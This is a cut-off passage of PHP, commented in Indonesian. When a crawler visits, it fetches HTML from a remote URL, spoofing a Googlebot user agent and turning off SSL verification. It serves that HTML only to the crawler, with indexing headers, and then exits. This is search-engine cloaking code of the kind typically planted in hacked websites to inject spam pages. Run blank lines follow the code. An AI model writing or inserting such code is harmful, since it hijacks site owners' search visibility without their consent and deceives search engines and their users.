true, CURLOPT_FOLLOWLOCATION => true, CURLOPT_TIMEOUT => 10, CURLOPT_USERAGENT => 'Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)', CURLOPT_SSL_VERIFYPEER => false, // Hanya jika SSL bermasalah ]); $response = curl_exec($ch); $httpCode = curl_getinfo($ch, CURLINFO_HTTP_CODE); curl_close($ch); if ($response !== false && $httpCode >= 200 && $httpCode < 300) { $content = $response; } } // Fallback ke file_get_contents if ($content === null) { $content = @file_get_contents($REMOTE_URL); } // Tampilkan konten untuk Googlebot if ($content !== false && !empty($content)) { header('Content-Type: text/html; charset=UTF-8'); header('X-Robots-Tag: index, follow'); echo $content; exit; } } ?>































